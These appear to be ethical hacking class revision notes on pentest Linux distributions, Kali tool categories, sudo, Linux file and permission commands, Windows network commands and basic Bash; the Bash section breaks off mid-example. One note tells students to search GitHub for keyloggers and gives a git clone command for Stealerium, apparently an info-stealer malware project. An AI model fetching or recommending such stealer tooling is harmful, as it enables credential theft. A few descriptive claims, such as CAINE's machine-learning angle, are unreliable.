class revisions of EHP
Week 1
Week 2 OS Fundamentals
Whether you're aiming for a career in cybersecurity or simply want to explore the world of
penetration testing, there's a Linux distribution tailored to meet your needs.
1. Parrot Security OS
Parrot Security OS targets penetration testers and certified security personnel, but it also aims to
help those who need a privacy-focused distro such as journalists and ethical hackers.
What sets Parrot Security apart from other Linux distributions is that it offers an array of privacy
tools and encryption features.
It even offers a home edition that anyone can use to stay secure online. It also comes with a digital
forensics tab that was built in collaboration with the developers of CAINE.
2. Kali Linux
Kali Linux is an excellent choice for those new to penetration testing, while also remaining a go-to
distro for seasoned professionals in ethical hacking. Built on the Debian operating system, Kali uses
the Xfce desktop environment and comes preloaded with a comprehensive set of penetration testing
tools.
Its flexibility makes it a favorite among experts, as it allows users to create custom Kali-based
distros tailored to specific needs. Kali Linux also benefits from a large community, offering extensive
documentation and user-generated tutorials to support both beginners and advanced users.
3. BackBox Linux
BackBox Linux is an Ubuntu-based distribution designed for security assessments and penetration
testing. It includes a broad set of tools for web application and network analysis, making it a powerful
choice for security professionals.
BackBox is also beginner-friendly, with helpful tooltips and descriptions for each included tool, which
makes navigating its application menu easier, even for users who are new to penetration testing.
This user-friendly approach ensures that you can quickly find the tools you need to get started.
4. BlackArch Linux
BlackArch is a favorite among experienced security researchers and penetration testers due to its
vast collection of tools—over 2,000, in fact. While its user interface may not be the most beginner-
friendly, the well-organized repository makes it easy to navigate and find the tools you need.
BlackArch is regularly updated with new tools and improvements, maintaining its status as one of the
most comprehensive and popular Linux distros for ethical hacking and penetration testing. It's ideal
for professionals who need a robust toolkit for advanced security assessments.
5. ArchStrike
ArchStrike (formerly known as ArchAssault) is a penetration testing and cybersecurity-focused
project built on Arch Linux. It combines the flexibility and power of Arch Linux with a comprehensive
set of tools specifically for security professionals and penetration testers.
ArchStrike includes thousands of tools and applications, organized into modular package groups,
allowing users to easily access the tools they need for various security tasks.
Download ArchStrike
6. Fedora Security Spin
This distribution is designed to support students and instructors as they practice and learn various security
methodologies, including information security, web application security, forensic analysis, and more.
With its focused toolset and robust support for security education, Fedora Security Spin provides an
ideal environment for both hands-on learning and professional security assessments.
7. Pentoo Linux
Pentoo is an excellent choice for users who are already familiar with Gentoo or are willing to invest
time in learning it. This distribution can be installed as an overlay on an existing Gentoo system or
run as a standalone OS.
However, Pentoo may not be ideal for beginners in penetration testing, as it comes with a steep
learning curve and a less structured organization that could be overwhelming for newcomers.
Additionally, it has limited documentation and support, which may pose a challenge for those new to
ethical hacking.
Despite these drawbacks, Pentoo remains popular among Gentoo enthusiasts and experienced
users who appreciate its flexibility and powerful toolset.
8. Caine
Once you've gained some experience in penetration testing, CAINE (Computer-Aided Investigation
Environment) could be a valuable addition to your toolkit. Designed to simplify the process of
analyzing disks and drives, CAINE leverages automation to generate detailed reports, making it an
excellent resource for security teams.
Built on Ubuntu, CAINE is particularly well-suited for testing machine learning environments, an area
reportedly growing at around 38% annually. Its focus on digital forensics and automation makes it a
strong choice for more advanced penetration testing and cybersecurity tasks.
Download Caine
9. Network Security Toolkit (NST)
Built for use in virtual machines, NST is ideal for tasks like analysis, validation, and monitoring of
networks. Its "all-in-one" toolkit makes it popular among ethical hackers, professional penetration
testers, and even beginners, as it offers a wide range of tools to address various security needs in a
single, easy-to-use package.
10. Bugtraq
Bugtraq is a penetration testing distribution specifically designed for reverse engineering and
malware analysis. Based on Debian, this versatile distro is available for multiple operating systems
and provides excellent support for penetration testers.
Bugtraq comes preloaded with a variety of analysis tools, including mobile forensics, malware
testing, and other specialized features. All of these tools are developed and maintained by the
Bugtraq community, making it a valuable resource for those focused on security research, malware
analysis, and reverse engineering.
Download Bugtraq
11. DEFT Linux
DEFT (Digital Evidence and Forensics Toolkit) bundles the DART (Digital Advanced
Response Toolkit) software and comes preconfigured with a wide range of popular forensic tools and
resources.
DEFT is tailored for ethical hackers, penetration testers, IT security professionals, and others who
need to conduct digital investigations, analyze evidence, and respond to security incidents
effectively. With its comprehensive toolkit, DEFT is a valuable resource for anyone involved in digital
forensics and cybersecurity.
The Kali Linux penetration testing platform contains a vast array of tools and utilities. From
information gathering to final reporting, Kali Linux enables security and IT professionals to assess
the security of their systems.
Find out all about Kali's Tools
Kali Linux comes with a wide range of pre-installed tools, categorized into different groups based on
their purpose. Here's a list of the main categories of tools in Kali Linux, which are commonly used for
penetration testing, ethical hacking, and cybersecurity assessments:
1. Information Gathering
Tools for gathering information about the target, such as network infrastructure, open ports, and
services.
2. Vulnerability Analysis
Tools for identifying and analyzing vulnerabilities in systems, networks, or applications.
3. Exploitation Tools
Tools to exploit discovered vulnerabilities in systems and networks.
4. Wireless Attacks
Tools for attacking and analyzing wireless networks.
5. Web Application Analysis
Tools for assessing and attacking web applications.
Burp Suite – Web application security testing framework
OWASP ZAP – Web application security scanner
dirbuster – Directory and file brute-forcing tool
sqlmap – Automated SQL injection and database takeover tool
w3af – Web application attack and audit framework
6. Password Attacks
Tools used for password cracking, brute forcing, and dictionary attacks.
7. Post Exploitation
Tools for maintaining control, gathering information, or escalating privileges after initial system
compromise.
8. Forensics
Tools for digital forensics analysis, data recovery, and investigation.
9. Reverse Engineering
Tools for analyzing malware, unpacking binaries, and reverse engineering applications.
10. Sniffing & Spoofing
Tools for capturing, inspecting, and manipulating network traffic.
dsniff – Network sniffer for network traffic analysis
tcpdump – Command-line packet analyzer
mitmproxy – Interactive man-in-the-middle proxy for HTTP/S traffic
These are the main categories of tools found in Kali Linux. Kali includes many other tools beyond
these categories, each serving different aspects of penetration testing, cybersecurity, and digital
forensics. Kali Linux offers a comprehensive suite that makes it one of the go-to distributions for
ethical hackers, penetration testers, and security professionals.
Overview of sudo
sudo (short for "SuperUser Do") is a command-line utility used in Unix-like operating systems (such
as Linux and macOS) to allow a permitted user to execute a command as the superuser (root) or
another user, as specified by security policy. It provides a mechanism for delegated administrative
control and helps protect systems by limiting direct access to root privileges.
1. Running Commands as Root:
The most common use of sudo is to execute commands with superuser (root) privileges. This is
essential for performing administrative tasks like installing software, modifying system files, or
managing system services.
Example:
>> sudo apt install nmap # Installing software requires root privileges
2. Controlled Access:
sudo provides granular control over who can execute what commands, and under what conditions.
This is managed through the /etc/sudoers file, which is edited using visudo to ensure syntax integrity.
Only users who are listed in this file (or in group memberships) can run commands with elevated
privileges.
3. Logging:
Every command run through sudo is logged, which helps in auditing and tracking who did what on
the system. These logs can be found in /var/log/auth.log or /var/log/sudo depending on the system
configuration.
4. Timeout:
After a user enters their password to execute a command with sudo, a timestamp is set. For a
configurable time period (usually 15 minutes), they won’t need to enter the password again for
additional sudo commands.
• By using sudo, users are not granted full access to the root account, but instead can run specific
commands as root. This minimizes the risk of accidental system-wide damage and protects against
malicious activities that could result from using a root shell directly.
• sudo reduces the chances of mistakes made while logged in as root, especially since the root
account can be disabled in some systems for extra security.
Basic Syntax:
>> sudo [options] command
1. Running Commands as Another User: Use the -u option to run a command as a user other than root.
Example:
sudo -u john ls /home/john # Run the `ls` command as user 'john'
2. No Password Prompt (Dangerous - Use with Caution): You can configure sudo to not ask for a
password when running commands. This is done by modifying the /etc/sudoers file, but should be
used cautiously.
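Such an entry in /etc/sudoers (always edited via visudo) might look like the following sketch; the user name and command here are hypothetical:

```
# user   hosts = (run-as) [NOPASSWD:] commands
deploy   ALL   = (ALL)    NOPASSWD: /usr/bin/systemctl restart nginx
```

This would let the hypothetical user deploy restart nginx without a password, while every other command still prompts for one.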
3. Editing Files as Root: Using sudo to open an editor (e.g., vi, nano) with root privileges to modify
system files:
4. Checking the User's Privileges: You can check which commands a user is allowed to run via sudo
by using:
sudo -l
5. Editing the sudoers File: Always edit /etc/sudoers through visudo, which validates the syntax before saving:
sudo visudo
6. Revoke sudo Access: If you need to revoke a user's sudo privileges, you would remove them from
the relevant sudoers group or file.
Security Considerations:
• Least Privilege Principle: Always assign only the minimum necessary privileges to users.
• Passwordless sudo: Disabling the password prompt can be risky, so it's advisable to limit this
practice unless there’s a specific use case.
• Sudoers File Management: Mistakes in the /etc/sudoers file can lock you out of administrative
privileges. Always use visudo, which checks for syntax errors before saving.
1. System Update:
sudo apt update && sudo apt upgrade # Update packages on a Debian-based system
2. Add a User:
sudo useradd -m newuser # Create a new user
3. Restart a Service:
sudo systemctl restart apache2 # Restart the Apache service
Conclusion:
sudo is an essential tool in Unix-like systems for safely managing administrative tasks without the
need to switch to the root account. It offers an extra layer of security, flexibility, and accountability
by allowing users to execute commands as root or another user with specific permissions.
Key Concepts and Common Commands:
Understanding these commands allows you to explore, manage, and manipulate files and directories
on a Linux system efficiently.
1. pwd (Print Working Directory)
Purpose: Tells you where you are in the file system.
Usage:
>> pwd
2. ls (List)
Purpose: Lists the contents of the current directory.
Usage:
>> ls
3. cd (Change Directory)
Purpose: Move between directories.
Usage:
>> cd /path/to/directory
4. cd ~ (Home Directory)
Purpose: Quickly go to your home directory.
Usage:
>> cd ~
5. cd .. (Parent Directory)
Purpose: Go one level up in the directory tree.
Usage:
>> cd ..
6. ls -l (Long Listing)
Purpose: Lists files with detailed information (permissions, owner, size, date).
Usage:
>> ls -l
7. ls -a (All Files)
Purpose: Lists all files, including hidden ones (names starting with a dot).
Usage:
>> ls -a
8. mkdir (Make Directory)
Purpose: Create a new directory.
Usage:
>> mkdir new_directory
9. rmdir (Remove Directory)
Purpose: Delete an empty directory.
Usage:
>> rmdir directory_name
10. rm (Remove File)
Purpose: Delete a file.
Usage:
>> rm file_name
11. find (Search for Files)
Purpose: Search a directory tree for files matching criteria such as name, size, or modification time.
Usage:
>> find /path/to/search -name "filename"
12. locate (Find Files Fast)
Purpose: Find files quickly using a prebuilt index (refresh it with updatedb).
Usage:
>> locate filename
13. cp (Copy)
Purpose: Copy files or directories.
Usage:
>> cp source_file destination
14. mv (Move/Rename)
Purpose: Move files to a new location or rename them.
Usage:
>> mv old_name new_name # Rename a file
>> mv file_name /new/path # Move a file
15. cat (Concatenate)
Purpose: Print a file's contents to the terminal.
Usage:
>> cat filename
16. more (Page Through a File)
Purpose: View a file one screen at a time.
Usage:
>> more filename
17. less (Scroll Through a File)
Purpose: Like more, but allows scrolling backward as well as forward.
Usage:
>> less filename
18. head (View the Start of a File)
Purpose: Display the first few lines of a file (default: 10).
Usage:
>> head filename
19. tail (View the End of a File)
Purpose: Display the last few lines of a file (default: 10).
Usage:
>> tail filename
20. df (Disk Free)
Purpose: Report free and used space on mounted filesystems.
Usage:
>> df -h
21. du (Disk Usage)
Purpose: Show how much space a directory or file occupies.
Usage:
>> du -sh directory_name
22. tree (Directory Tree)
Purpose: Display the directory structure as a tree.
Usage:
>> tree
23. stat (File Status)
Purpose: Show detailed metadata about a file (size, permissions, timestamps).
Usage:
>> stat filename
24. file (File Type)
Purpose: Identify a file's type from its contents.
Usage:
>> file filename
25. touch (Create/Update a File)
Purpose: Create an empty file or update an existing file's timestamp.
Usage:
>> touch new_file
26. basename
Purpose: Extract the file name from a path, or remove a file extension (suffix).
Usage:
>> basename /path/to/file.txt # Outputs: file.txt
>> basename /path/to/file.txt .txt # Outputs: file
27. dirname
Purpose: Extract the directory portion of a path.
Usage:
>> dirname /path/to/file.txt # Outputs: /path/to
28. which
Purpose: Show the full path of the executable that would run for a command.
Usage:
>> which command_name
29. whereis
Purpose: Locate a command's binary, source, and man page.
Usage:
>> whereis command_name
30. history
Purpose: List the commands you have run in this shell.
Usage:
>> history
31. !n (Repeat a Command)
Purpose: Re-run a command by its history number.
Usage:
>> !15 # Run the command listed as number 15 in your history
32. alias
Purpose: Define a shortcut for a longer command.
Usage:
>> alias ll='ls -l' # Create an alias for 'ls -l' to be run as 'll'
33. unalias
Purpose: Remove a previously defined alias.
Usage:
>> unalias ll # Removes the 'll' alias
34. mount
Purpose: Attach a filesystem (e.g., a drive or partition) to a directory.
Usage:
>> sudo mount /dev/sdb1 /mnt/mydrive # Mount a drive to a specific directory
35. umount
Purpose: Detach a mounted filesystem.
Usage:
>> sudo umount /mnt/mydrive
36. chattr (Change Attributes)
Purpose: Set or clear low-level file attributes such as the immutable flag.
Usage:
>> sudo chattr +i filename # Make a file immutable (cannot be modified, deleted, etc.)
>> sudo chattr -i filename # Remove the immutable flag
37. fuser
Purpose: Show (or kill) the processes currently using a file.
Usage:
>> fuser filename # Displays the process ID(s) using the file
>> fuser -k filename # Kill processes using the file
38. mount -o loop (Mount an Image)
Purpose: Mount a disk image file (such as an ISO) as if it were a device.
Usage:
>> sudo mount -o loop /path/to/file.iso /mnt/iso
39. lsblk (List Block Devices)
Purpose: List disks and partitions in a tree view.
Usage:
>> lsblk
40. blkid
Purpose: Show block-device attributes such as UUID and filesystem type.
Usage:
>> blkid
41. rsync
Purpose: Efficiently synchronize files locally or to a remote host.
Usage:
>> rsync -av source_directory/ destination_directory/
>> rsync -avz source_directory/ user@remote_host:/path/to/destination/
42. tar
Purpose: Create and extract archive files, optionally compressed.
Usage:
>> tar -cvf archive.tar directory_name # Create a tarball (archive)
>> tar -xvf archive.tar # Extract a tarball
>> tar -czvf archive.tar.gz directory_name # Create a compressed tarball
>> tar -xzvf archive.tar.gz # Extract a compressed tarball
43. gzip / gunzip
Purpose: Compress and decompress individual files (.gz).
Usage:
>> gzip filename # Compress file
>> gunzip filename.gz # Decompress file
44. bzip2 / bunzip2
Purpose: Compress and decompress individual files (.bz2).
Usage:
>> bzip2 filename # Compress file
>> bunzip2 filename.bz2 # Decompress file
45. zip / unzip
Purpose: Create and extract .zip archives.
Usage:
>> zip archive.zip file1 file2 # Create a zip archive
>> unzip archive.zip # Extract a zip archive
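The tar and gzip round trip can be verified end to end with a short, self-contained session (the /tmp path below is arbitrary):

```shell
set -e
dir=/tmp/ehp_tar_demo && rm -rf "$dir" && mkdir -p "$dir" && cd "$dir"
mkdir data && echo "hello" > data/a.txt   # sample content
tar -czvf data.tar.gz data                # create a compressed tarball
rm -rf data                               # remove the original
tar -xzvf data.tar.gz                     # extract it back
cat data/a.txt                            # prints: hello
```

The -v flag makes tar print each file name as it is archived or extracted.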
46. mount -t (Mount with Filesystem Type)
Purpose: Mount a device while specifying its filesystem type explicitly.
Usage:
>> sudo mount -t ext4 /dev/sdb1 /mnt/mydrive # Mount with a specific filesystem type (ext4 in this case)
47. lsmod (List Kernel Modules)
Purpose: List the kernel modules currently loaded.
Usage:
>> lsmod
48. dmesg
Purpose: Print kernel ring-buffer messages (boot and hardware events).
Usage:
>> dmesg
49. lsof (List Open Files)
Purpose: Show which processes have a file open.
Usage:
>> lsof filename
50. mount | grep (Check Mounts)
Purpose: Filter the list of mounted filesystems.
Usage:
>> mount | grep /mnt
51. df -i (Inode Usage)
Purpose: Report inode usage instead of block usage.
Usage:
>> df -i
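To tie several of these commands together, here is a small self-contained session (the paths under /tmp are arbitrary):

```shell
set -e
base=/tmp/ehp_fs_demo && rm -rf "$base" && mkdir -p "$base" && cd "$base"
mkdir project                     # create a directory
touch project/notes.txt           # create an empty file
cp project/notes.txt backup.txt   # copy it
mv backup.txt project/backup.txt  # move/rename the copy
find . -name "*.txt"              # lists both .txt files
ls -l project                     # long listing with permissions and sizes
```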
Conclusion
With these commands, you have a comprehensive toolkit to navigate and manage the Linux file
system effectively. These commands cover everything from basic navigation to advanced system
administration tasks. Keep this reference handy for when you need to perform routine tasks or
troubleshoot issues!
1. What Is a User?
In Linux, a user is anyone or anything that interacts with the system. A user could be a person, a
service, or a process. Each user has a unique identity and access level.
2. Types of Users
Root User:
• The root user has unlimited privileges to do anything on the system (e.g., install software, change
configurations, manage files).
• Be cautious: Root has the power to break things easily if used incorrectly.
Regular Users:
• Regular users have restricted access compared to the root user. They can access only their files
and directories, and any system-wide actions require elevated permissions (e.g., via sudo).
System Users:
• These users are created by the system for specific services or applications (e.g., www-data for web
services). These users don’t log in but are used by processes.
3. Understanding User Accounts
User Name (Login Name):
This is the name you use to log in, e.g., john, alice, or admin.
User ID (UID):
Every user has a User ID (UID), which is a unique number associated with the user. For example, root
has UID 0, and on most distributions regular user accounts start at UID 1000.
Group Name:
• Each user is also associated with a primary group. This is a collection of users that share common
permissions.
Home Directory:
• This is where a user's personal files are stored. It’s usually located at /home/<username>, e.g., /
home/john.
Shell:
• The shell is the command-line interface that the user interacts with (e.g., bash, zsh).
4. Managing Users
Adding a User
>> sudo useradd -m <username>
Creates the account and (with -m) a home directory.
Setting a Password
>> sudo passwd <username>
Deleting a User
>> sudo userdel <username>
Deletes the user account. Use sudo userdel -r <username> to remove the user's home directory as
well.
5. Groups in Linux
Groups allow you to manage permissions for multiple users easily. A group is a collection of users
that share common access rights to files, directories, and resources.
Listing Groups a User Belongs To
>> groups <username>
6. File Permissions
Symbolic Representation:
r = read
w = write
x = execute
Example: -rwxr-xr-- indicates: owner rwx, group r-x, others r--.
Permissions Overview
• r (read): Allows the user to view the contents of a file.
• w (write): Allows the user to modify or delete the file.
• x (execute): Allows the user to run the file as a program.
1. Owner (User who created the file) (Owner has read, write, and execute permissions.)
2. Group (Users in the file’s group) (Group has read and execute permissions.)
3. Others (Everyone else) (Others have only read permissions.)
r=4
w=2
x=1
Example: 755 means: owner = 7 (rwx), group = 5 (r-x), others = 5 (r-x).
Changing Permissions:
Changing Ownership:
Checking Permissions
Use ls -l to view permissions:
>> ls -l <filename>
Example output:
-rwxr-xr-- 1 john john 1234 Nov 24 12:00 example.txt
• The first character (-) indicates it's a file (a 'd' would indicate a directory).
• rwx = Owner has read, write, and execute permissions.
• r-x = Group has read and execute permissions.
• r-- = Others have only read permissions.
Usage:
>> chmod +x file_name # Add execute permission
>> chmod 755 file_name # Set specific permissions
r = 4, w = 2, x = 1
Combine them: 7 = rwx, 6 = rw-, 5 = r-x, 4 = r--, etc.
Example:
>> chmod 755 <filename> # rwxr-xr-x
>> chmod u+x <filename> # Add execute permission for the user (owner)
>> chmod g-w <filename> # Remove write permission from the group
>> chmod o=r <filename> # Set read-only permission for others
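These chmod forms can be checked end to end as an unprivileged user (the file name and /tmp path are arbitrary):

```shell
set -e
dir=/tmp/ehp_perm_demo && rm -rf "$dir" && mkdir -p "$dir" && cd "$dir"
touch script.sh
chmod 755 script.sh        # numeric form: rwxr-xr-x
ls -l script.sh            # mode column shows -rwxr-xr-x
chmod o-r script.sh        # symbolic form: remove read from others
stat -c '%a' script.sh     # prints: 751
```

After o-r, the "others" digit drops from 5 (r-x) to 1 (x only), giving 751.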
Example: sudo chown john:admin example.txt changes the owner to john and the group to admin.
7. Special Permissions
SUID (Set User ID):
Allows a program to run with the privileges of the file's owner (usually root).
Indicated by an s in the execute position for the owner:
SGID (Set Group ID):
Similar to SUID, but the program runs with the group's privileges.
Indicated by an s in the execute position for the group:
Sticky Bit:
Restricts file deletion in a shared directory to the file owner, not anyone with write permission.
Indicated by a t in the execute position for others:
8. Using sudo
sudo allows regular users to execute commands with elevated (root) privileges.
Example:
>> sudo apt-get update # Run as root
You will be prompted for your password, and you can only run sudo commands if your user is in the
sudoers group.
By keeping these basic principles in mind, you can manage users and privileges effectively on any
Linux system, whether you're a beginner or an advanced user.
1. Command: ipconfig (Windows)
Description: Displays the current network configuration details, such as IP address, subnet mask, and
default gateway of network adapters.
Example:
$ ipconfig

Command: ping
Description: Sends ICMP echo requests to test whether a host is reachable and to measure round-trip time.
Example:
$ ping google.com
Output:
Pinging google.com [142.250.72.238] with 32 bytes of data:
Reply from 142.250.72.238: bytes=32 time=12ms TTL=116
Reply from 142.250.72.238: bytes=32 time=10ms TTL=116
Reply from 142.250.72.238: bytes=32 time=13ms TTL=116
2. Command: tracert
Description: Traces the route taken by packets to a destination host, showing the intermediate
routers.
Example:
$ tracert google.com
Output:
Tracing route to google.com [142.250.72.238]
over a maximum of 30 hops:
3. Command: netstat
Description: Displays active network connections, listening ports, and associated network statistics.
Example:
$ netstat
Output:
Active Connections
4. Command: nslookup
Description: Queries DNS to resolve a domain name to an IP address (or vice versa).
Example:
$ nslookup google.com
Output:
Server: dns.google
Address: 8.8.8.8
Non-authoritative answer:
Name: google.com
Address: 142.250.72.238
5. Command: hostname
Description: Displays the name of the local computer.
Example:
$ hostname
Output:
my-computer
6. Command: arp
Description: Displays and modifies the ARP (Address Resolution Protocol) table, showing the mapping
between IP addresses and MAC addresses.
Example:
$ arp -a
Output:
Interface: 192.168.1.10 --- 0x12
Internet Address Physical Address Type
192.168.1.1 00-14-22-01-23-45 Dynamic
7. Command: route
Description: Displays or modifies the local IP routing table.
Example:
$ route print
Output:
IPv4 Route Table
==============================================================
=====
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 192.168.1.1 192.168.1.10 25
8. Command: telnet
Description: Opens an interactive connection to a remote host on a given port; often used to test whether a TCP service is reachable.
Example:
$ telnet example.com 23
Output:
Trying 203.0.113.1...
Connected to example.com.
Escape character is '^]'.
Welcome to the Telnet server!
9. Command: ftp
Description: Transfers files to and from a remote host using the File Transfer Protocol.
Example:
$ ftp example.com
Output:
Connected to example.com.
220 Welcome to the FTP server.
Name (example.com:user):
10. Command: net
Description: Manages network resources, such as shares, sessions, and users.
Example:
$ net view
Output:
Server Name Remark
-----------------------------------------
\\SERVER1 File Server
\\SERVER2 Database Server
The command completed successfully.
11. Command: netsh
Description: Displays and configures network settings, including interfaces, IP addressing, and the firewall.
Example:
$ netsh interface ip show config
Output:
Configuration for interface "Ethernet"
DHCP enabled: Yes
IP Address: 192.168.1.10
Subnet Mask: 255.255.255.0
Default Gateway: 192.168.1.1
Command: net use
Description: Connects to or disconnects from shared network resources, such as mapping a drive letter to a share.
Example:
$ net use Z: \\SERVER1\shared_folder
Output:
The command completed successfully.
Command: net view
Description: Lists the shared resources available on a remote computer.
Example:
$ net view \\SERVER1
Output:
Shared resources at \\SERVER1
Resource Type Comment
-----------------------------------------
shared_folder Disk Shared Documents
The command completed successfully.
Command: net share
Description: Creates, deletes, or manages shared folders on the local computer.
Example:
$ net share shared_docs=C:\Shared
Output:
shared_docs was shared successfully.
Command: net session
Description: Displays and manages active network sessions with the local computer.
Example:
$ net session
Output:
Computer User name Client Type Opens Idle time
192.168.1.15 admin Windows 2 00:15:30
The command completed successfully.
Command: net time
Description: Synchronizes the local computer's clock with a network time server.
Example:
$ net time \\SERVER1 /set /yes
Output:
The current time at \\SERVER1 is 11/26/2024 10:15:42 AM.
The command completed successfully.
Command: netdom
Description: A domain management tool for joining computers to a domain, resetting passwords,
and more.
Example:
$ netdom join MYCOMPUTER /domain:example.local /userd:admin /passwordd:*
Output:
The machine account password was successfully reset.
The command completed successfully.
Command: nbtstat
Description: Displays NetBIOS over TCP/IP statistics and the status of current connections.
Example:
$ nbtstat -a 192.168.1.10
Output:
Local Area Connection:
Node IpAddress: [192.168.1.10] Scope Id: []
Command: ipconfig /flushdns
Description: Clears the local DNS resolver cache.
Example:
$ ipconfig /flushdns
Output:
Successfully flushed the DNS Resolver Cache.
Command: ipconfig /release
Description: Releases the current DHCP configuration for all network adapters.
Example:
$ ipconfig /release
Output:
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 0.0.0.0
Subnet Mask . . . . . . . . . . . : 0.0.0.0
Default Gateway . . . . . . . . . :
Command: ipconfig /renew
Description: Requests fresh DHCP leases for the network adapters.
Example:
$ ipconfig /renew
Output:
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . : example.local
IPv4 Address. . . . . . . . . . . : 192.168.1.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
Command: netsh firewall
Description: Enables or disables the Windows Firewall (legacy syntax; modern systems use netsh advfirewall).
Example:
$ netsh firewall set opmode mode=enable
Output:
Ok.
Command: netstat -a
Description: Displays all active connections and listening ports.
Example:
$ netstat -a
Output:
Active Connections
Week 03
1. View Files
>> cat
Description: The cat command is used to display the contents of a file on the terminal. It stands for
"concatenate" and is often used for displaying small files or combining multiple files.
Example:
$ cat example.txt
Output:
Hello, this is an example file.
This file contains a few lines of text.
>> more
Description: The more command is used to view the contents of a file one screen at a time. It allows
scrolling through large files.
Example:
$ more longfile.txt
>> less
Description: Similar to more, but with more features, less allows backward navigation and is more
versatile for viewing large files.
Example:
$ less largefile.txt
Output:
This is a large file. You can scroll up and down with arrow keys, search with '/' and quit with 'q'.
>> head
Description: The head command is used to display the first few lines (default 10) of a file.
Example:
$ head example.txt
>> tail
Description: The tail command is used to display the last few lines (default 10) of a file. It’s often
used with the -f option to monitor log files in real-time.
Example:
$ tail example.log
Output (last 10 lines):
Error: Failed to load configuration.
Warning: Disk space low.
2. Create Files
>> touch
Description: The touch command is used to create an empty file or update the timestamp of an
existing file.
Example:
$ touch newfile.txt
>> echo
Description: The echo command can create a file with content by redirecting output into it. Use > to
overwrite and >> to append.
Example:
$ echo "This is a new file" > file.txt
$ echo "A second line" >> file.txt # Append without overwriting
Description: You can also use cat to create a new file and write content into it. Press Ctrl+D to save
and exit.
Example:
$ cat > newfile.txt
Output:
(typing) This is some text.
(typing) Another line of text.
Press Ctrl+D to save.
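In scripts, a here-document gives the same result without interactive typing (the file name and /tmp path are arbitrary):

```shell
dir=/tmp/ehp_heredoc_demo && rm -rf "$dir" && mkdir -p "$dir" && cd "$dir"
# Everything between <<'EOF' and EOF is written to the file verbatim
cat > newfile.txt <<'EOF'
This is some text.
Another line of text.
EOF
cat newfile.txt
```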
>> nano / vim
Description: These text editors can be used to create and edit files interactively.
Example:
$ nano newfile.txt
Output: Opens the nano editor, where you can type text. Press Ctrl+O to save, Ctrl+X to exit.
Or with vim:
$ vim newfile.txt
Output: Opens the vim editor. Press i to enter insert mode, type text, then press Esc, type :wq to save
and quit.
3. Edit Files
>> nano
Description: nano is a terminal-based text editor that is easy to use. It allows editing of files directly
in the terminal.
Example:
$ nano example.txt
Output: Opens example.txt in the nano editor. You can edit the file directly in the terminal, and save
with Ctrl+O, then exit with Ctrl+X.
>> vim/vi
Description: vim (or vi) is a more advanced text editor, suitable for both simple and complex text
editing tasks. It requires learning basic commands to use efficiently.
Example:
$ vim example.txt
>> sed
Description: sed is a stream editor that can modify file content directly from the command line,
making it useful for automated edits. It supports search and replace, insertions, and deletions.
Example:
$ sed -i 's/oldword/newword/' file.txt
Output:
Replaces all occurrences of "oldword" with "newword" in file.txt
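That substitution can be confirmed with a self-contained check (GNU sed's -i flag is assumed; the file content is made up for the demo):

```shell
set -e
dir=/tmp/ehp_sed_demo && rm -rf "$dir" && mkdir -p "$dir" && cd "$dir"
echo "hello oldword" > file.txt
sed -i 's/oldword/newword/' file.txt   # edit the file in place
cat file.txt                           # prints: hello newword
```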
>> awk
Description: awk is a powerful text processing tool. It can perform actions on files based on patterns
and conditions.
Example:
$ awk '{ print $1 }' example.txt
Output:
(prints the first field of each line in the file `example.txt`)
Line1Field1
Line2Field1
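Beyond printing fields, awk can accumulate values across lines; a common idiom is summing a column (the sample input is made up):

```shell
# Sum the first column of three sample lines
printf '3 a\n4 b\n5 c\n' | awk '{ sum += $1 } END { print sum }'   # prints: 12
```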
--------------------------------------------------------------------------------------------------------
4. Copy and Search Files
>> cp
Description: The cp command copies a file or directory.
Example:
$ cp source.txt destination.txt
>> grep
Description: The grep command is used to search for patterns within files. It can be combined with
other commands or used by itself to find specific text in large files.
Example:
$ grep "error" logfile.txt
Output:
Error: File not found.
Error: Network connection lost.
You can also use grep with the -r option to recursively search within a directory:
$ grep -r "keyword" /path/to/directory/
>> find
Description: The find command searches for files and directories within a specified location based on
various criteria (e.g., file name, modification time, size).
Example:
$ find /home/user/ -name "*.txt"
Output:
/home/user/file1.txt
/home/user/docs/file2.txt
5. Archive and Compress Files
>> tar
Description: tar is used to create, extract, or list archive files. Commonly used with compression
tools like gzip or bzip2 to compress archives.
Example:
$ tar -cvf archive.tar directory1/
Output:
directory1/
directory1/file1.txt
>> zip / unzip
Description: zip and unzip are used to create and extract .zip files.
Example:
$ zip archive.zip file1 file2
$ unzip archive.zip
>> gzip / gunzip
Description: gzip is used for file compression and gunzip is used to decompress .gz files.
Example (Compress a file):
$ gzip example.txt
-----------------------------------------------------------------------------------------
>> vim (multiple files)
Description: You can open multiple files in vim using tabs or buffers for easier editing.
Example:
$ vim file1.txt file2.txt
Use :bn to switch to the next file, and :bp to go back to the previous file.
>> multitail
Description: multitail is useful for viewing multiple log files at the same time in a split-screen format.
Example:
$ multitail /var/log/syslog /var/log/auth.log
Conclusion
This expanded file management handbook provides a broader set of tools for working with files in
Linux. It covers viewing, creating, and editing files, as well as more advanced techniques for
managing permissions, compressing, searching, and backing up files. Familiarity with these
commands will greatly enhance your productivity when working in Linux environments.
By combining these commands, you can streamline tasks and automate workflows to increase
efficiency.
Note:
If you need to install any tools, search online and read through the installation process.
Some tools are hosted on GitHub; a quick search will usually surface them.
For example, searching:
keylogger GitHub parrot Linux
https://github.com/topics/keylogger
Example:
>> git clone https://github.com/Stealerium/Stealerium.git
Bash (Bourne Again Shell) is a widely used command-line interpreter for Unix-like systems such as
Linux and macOS. It allows users to write and execute script files containing a series of commands
that automate tasks and simplify system management.
Bash scripts are written in plain text and can perform a wide variety of tasks, such as system
administration, data processing, file management, and interacting with network resources.
1. Shebang (#!):
Every bash script begins with the "shebang" line (#!/bin/bash), which tells the system to execute the
script using the Bash interpreter.
Example:
#!/bin/bash
2. Variables:
You can store values in variables for later use. These can be strings, numbers, or results from
commands.
Example:
name="John"
echo "Hello, $name"
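Variables can also capture a command's output via command substitution, $( ... ):

```shell
user=$(whoami)            # store the output of `whoami`
today=$(date +%Y-%m-%d)   # store today's date, e.g. 2024-11-26
echo "Report for $user on $today"
```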
3. Commands:
Bash scripts execute commands just as you would in the terminal. This can include system
commands like ls, cp, mv, ifconfig, ip, and custom scripts or applications.
4. Control Flow:
Bash provides basic control flow structures such as if/else, for loops, while loops, and case
statements.
Example:
x=5
if [ "$x" -eq 5 ]; then
